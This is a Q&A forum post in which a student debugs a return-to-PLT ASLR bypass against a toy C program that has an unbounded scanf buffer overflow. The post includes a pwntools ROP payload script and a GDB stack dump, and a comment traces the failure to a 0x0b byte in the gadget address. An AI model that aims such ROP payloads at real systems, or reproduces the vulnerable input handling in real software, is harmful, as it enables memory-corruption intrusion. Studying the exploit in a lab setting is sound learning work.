0

I am trying to bypass the ASLR using the returntoplt attack for this I have to use a gadget pop rdi; ret I was able to find this gadget in __libc_csu_inint but for some reason whenever I use this address it gets corrupted in the stack. I can use __libc_csu_init + 88 anything greater than this gets corrupted and the pop rdi; ret is at __libc_csu_init + 91. What is happening is there a new kind of mitigation technique is which is preventing rip to point towards the gadget address?
My GCC version is: 11.3.0 Here is the C code:

#include<stdio.h>
#include<unistd.h>

void getmessage(void)
{
    char msg[200];
    printf("Enter the message: ");
    scanf("%s", msg);
    printf("Message received.\n");
}
void main(void)
{
    getmessage();
}

Here is my Exploit Script:

from pwn import *

puts_plt = 0x0401030
puts_got = 0x404018
start = 0x401060
bin = context.binary = ELF('vul')
pop_r14 = bin.symbols.__libc_csu_init + 91 #address of pop rdi; gadget.. 0x40120b
ret = bin.symbols._init + 22
context.os = "linux"
context.arch = "amd64"
payload = b'A' * 216
payload += p64(ret)
payload += p64(pop_r14)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(start)
f = open("file", "wb")
f.write(payload)
# vul = process("./vul")
# vul.sendline(payload)
# print(vul.recvline())
# print(vul.recvline())

The output of the GDB-PEDA-PLUGIN:

[----------------------------------registers-----------------------------------]
RAX: 0x12
RBX: 0x4011b0 (<__libc_csu_init>:       push   r15)
RCX: 0x7ffff7ec5603 (<__GI___libc_write+19>:    cmp    rax,0xfffffffffffff000)
RDX: 0x0
RSI: 0x4052a0 ("Enter the message: Message received.\n")
RDI: 0x7ffff7fa8670 --> 0x0
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffda18 --> 0x401016 (<_init+22>:   ret)
RIP: 0x401194 (<getmessage+78>: ret)
R8 : 0x12
R9 : 0xffffffffffffff88
R10: 0x400460 --> 0x6972700073747570 ('puts')
R11: 0x246
R12: 0x401060 (<_start>:        xor    ebp,ebp)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40118d <getmessage+71>:    call   0x401030 <puts@plt>
   0x401192 <getmessage+76>:    nop
   0x401193 <getmessage+77>:    leave
=> 0x401194 <getmessage+78>:    ret
   0x401195 <main>:     push   rbp
   0x401196 <main+1>:   mov    rbp,rsp
   0x401199 <main+4>:   call   0x401146 <getmessage>
   0x40119e <main+9>:   nop
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffda18 --> 0x401016 (<_init+22>:  ret)
0008| 0x7fffffffda20 --> 0x0
0016| 0x7fffffffda28 --> 0x7ffff7dfe7fd (<__libc_start_main+205>:       mov    edi,eax)
0024| 0x7fffffffda30 --> 0x7fffffffdb18 --> 0x7fffffffdd89 ("/mnt/c/Users/arsla/Desktop/University_Work/FYP_START/bufferoverflow/aslr_bypass/vul")
0032| 0x7fffffffda38 --> 0x1f7fcb000
0040| 0x7fffffffda40 --> 0x401195 (<main>:      push   rbp)
0048| 0x7fffffffda48 --> 0x7fffffffdd69 --> 0x515ef41e25354fba
0056| 0x7fffffffda50 --> 0x4011b0 (<__libc_csu_init>:   push   r15)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000401194      10      }
gdb-peda$
DeathNet123
  • 1
  • 2
  • So, i was able to solve this issue i noticed the address of gadget was ```0x40120b``` the problem is that ```0b``` is the ascii for the vertical tab so scanf was not taking the input properly. – DeathNet123 Jul 05 '22 at 13:50

0 Answers0